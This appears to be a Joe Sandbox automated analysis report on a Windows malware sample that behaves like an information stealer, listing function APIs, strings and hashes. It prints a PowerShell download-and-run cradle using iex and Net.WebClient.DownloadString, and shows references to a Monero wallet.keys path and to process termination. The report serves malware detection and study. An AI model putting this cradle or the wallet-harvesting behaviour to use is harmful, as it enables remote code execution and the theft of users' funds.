                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 2696918072-0
                          • Opcode ID: 62d56cd19268ba71a1c99da2a3dd3a3aca8f7bbff3cadd31bb859434912239d4
                          • Instruction ID: 0f1802a2fb7f77af733aabb3af27b8d3448bd6ceda2bee9f6863842739f583f5
                          • Opcode Fuzzy Hash: 62d56cd19268ba71a1c99da2a3dd3a3aca8f7bbff3cadd31bb859434912239d4
                          • Instruction Fuzzy Hash: D121FC75904218EBDB61DFA5DC88BEEBBB9BB48340F1041D8E509A6290D7B49E84CF91
                          Function 00037820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037834
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0003783B
                          • RegOpenKeyExA.ADVAPI32(80000002,00FCC0F0,00000000,00020119,00000000), ref: 0003786D
                          • RegQueryValueExA.ADVAPI32(00000000,00FDE200,00000000,00000000,?,000000FF), ref: 0003788E
                          • RegCloseKey.ADVAPI32(00000000), ref: 00037898
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 069372e4292b067876ccb06df10f9d68b5e08d2f62d7233bd0b32b10c3fe7c64
                          • Instruction ID: 90406d1e81969a7fd7d05a3cb03644ace76e88e50502c36669fa7c005e9c3a59
                          • Opcode Fuzzy Hash: 069372e4292b067876ccb06df10f9d68b5e08d2f62d7233bd0b32b10c3fe7c64
                          • Instruction Fuzzy Hash: 1D01ECB5A48309BBEB10DBE4ED4EF7E77BCEB48750F1041A4FA09A6291DA709904CB50
                          Function 000378B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000378C4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000378CB
                          • RegOpenKeyExA.ADVAPI32(80000002,00FCC0F0,00000000,00020119,00037849), ref: 000378EB
                          • RegQueryValueExA.ADVAPI32(00037849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0003790A
                          • RegCloseKey.ADVAPI32(00037849), ref: 00037914
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: e0d657de19a66c118bc1bf38b9218cbea9a54c4827fb3f487621b56603a7805c
                          • Instruction ID: e41ae855b43781ff4cdc051cb17201a3ebab407194acf1e5f966c0e8044ab193
                          • Opcode Fuzzy Hash: e0d657de19a66c118bc1bf38b9218cbea9a54c4827fb3f487621b56603a7805c
                          • Instruction Fuzzy Hash: 98014FB5A44309BBEB00DBE4EC4EFBEB778EB04710F0045A4FA05A6281D7706A10CBA1
                          Function 0002A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                          • LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                          • ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                          • LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                          • CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: e58d82a79bea2922487d55ebdcd461260ab8b1dbaea724d9c8f9b7a506d28c06
                          • Instruction ID: 12061ae35eb0d29520e2a2508c8da573cc8e1037099436ca8f362bcc85524eb6
                          • Opcode Fuzzy Hash: e58d82a79bea2922487d55ebdcd461260ab8b1dbaea724d9c8f9b7a506d28c06
                          • Instruction Fuzzy Hash: 15313074A00209EFDB14CF94E849FEE77B5FF49320F108158E911A7290DB74AA91CFA1
                          Function 000349D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,00FDE470), ref: 00034A2B
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                          • lstrcat.KERNEL32(?,00000000), ref: 00034A51
                          • lstrcat.KERNEL32(?,?), ref: 00034A70
                          • lstrcat.KERNEL32(?,?), ref: 00034A84
                          • lstrcat.KERNEL32(?,00FCB888), ref: 00034A97
                          • lstrcat.KERNEL32(?,?), ref: 00034AAB
                          • lstrcat.KERNEL32(?,00FDD9A0), ref: 00034ABF
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 00038F20: GetFileAttributesA.KERNEL32(00000000,?,00021B94,?,?,0004577C,?,?,00040E22), ref: 00038F2F
                            • Part of subcall function 000347C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000347D0
                            • Part of subcall function 000347C0: RtlAllocateHeap.NTDLL(00000000), ref: 000347D7
                            • Part of subcall function 000347C0: wsprintfA.USER32 ref: 000347F6
                            • Part of subcall function 000347C0: FindFirstFileA.KERNEL32(?,?), ref: 0003480D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 9f168a863952af3ce20bfa866fa429de54ccefe98cae3c30bcf2df2a228d967c
                          • Instruction ID: 0d18f058f70e987f1f1c60d462c4003b8ef597e6e60b73e49d155576632a0025
                          • Opcode Fuzzy Hash: 9f168a863952af3ce20bfa866fa429de54ccefe98cae3c30bcf2df2a228d967c
                          • Instruction Fuzzy Hash: BE3160B290021CABCB15EBB0EC99EED733CAB58700F4049D9B64596052EF70A7C9CB94
                          Function 00032EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00032FD5
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00032F14
                          • ')", xrefs: 00032F03
                          • <, xrefs: 00032F89
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00032F54
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 5279cff93d1bdbe455f8dde4d10bce8e33a0272a1b8cbe65a3d8dd758177a92a
                          • Instruction ID: bb9cdf332278347a9437b126c91840f1870991499821a2b0a02ab2976ade78e7
                          • Opcode Fuzzy Hash: 5279cff93d1bdbe455f8dde4d10bce8e33a0272a1b8cbe65a3d8dd758177a92a
                          • Instruction Fuzzy Hash: FF41FC71E102089ADB1AEBA1D8A2FEDB77DAF11300F404569E1467B193DF702A4ACF55
                          Function 00034300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00FDD760,00000000,00020119,?), ref: 00034344
                          • RegQueryValueExA.ADVAPI32(?,00FDE4D0,00000000,00000000,00000000,000000FF), ref: 00034368
                          • RegCloseKey.ADVAPI32(?), ref: 00034372
                          • lstrcat.KERNEL32(?,00000000), ref: 00034397
                          • lstrcat.KERNEL32(?,00FDE518), ref: 000343AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: eea488acc48ae3eef7e747b0cb13ac2209b529f99d0fc4e2c29046cfa09bbde4
                          • Instruction ID: dd48623648c38e3874b1ea95a478f7d68b564b44e97143ace273e910820f728c
                          • Opcode Fuzzy Hash: eea488acc48ae3eef7e747b0cb13ac2209b529f99d0fc4e2c29046cfa09bbde4
                          • Instruction Fuzzy Hash: 54418BB6900118ABDB25EBA0FC5AFFE733DAB48740F0045A8B71657182EA75578CCBD1
                          Function 0009CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                          • Instruction ID: f2de062f31bdb1b05cf60d8418b59369c2958c2c43fb00d33067fb891992140d
                          • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                          • Instruction Fuzzy Hash: F8218EB2D00618BBFF619F55CC41EBF3EA9EB81B90F054129F80E67252C3308D41ABA0
                          Function 00036BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00036C0C
                          • sscanf.NTDLL ref: 00036C39
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00036C52
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00036C60
                          • ExitProcess.KERNEL32 ref: 00036C7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 400fe66a849fc5722da8323ffabcbb05e39dd6ae54eb8142fd52ae9a9c762011
                          • Instruction ID: 2b871d62739766a7b9fb3c2a24d5d357ad1432f6811d2122ba3c2808278b885e
                          • Opcode Fuzzy Hash: 400fe66a849fc5722da8323ffabcbb05e39dd6ae54eb8142fd52ae9a9c762011
                          • Instruction Fuzzy Hash: ED21CB75D14208ABDF05EFE4E8499EEB7B9FF48310F04852AE506E3250EB359608CB65
                          Function 00037F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037FC7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037FCE
                          • RegOpenKeyExA.ADVAPI32(80000002,00FCC358,00000000,00020119,?), ref: 00037FEE
                          • RegQueryValueExA.ADVAPI32(?,00FDD6E0,00000000,00000000,000000FF,000000FF), ref: 0003800F
                          • RegCloseKey.ADVAPI32(?), ref: 00038022
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 807b0c306cf5926370bd55f5917eb6418736a9a60142a9fb5981998b746e2508
                          • Instruction ID: f461ab2c4d2a2e733a1d95f10d05d2afe1cf23000f2b38f2140aa1ec1950d84e
                          • Opcode Fuzzy Hash: 807b0c306cf5926370bd55f5917eb6418736a9a60142a9fb5981998b746e2508
                          • Instruction Fuzzy Hash: 69118CB1A44306ABD714CB88ED49FBFBBBCEB04B60F104169F615A7280D7755804CBA1
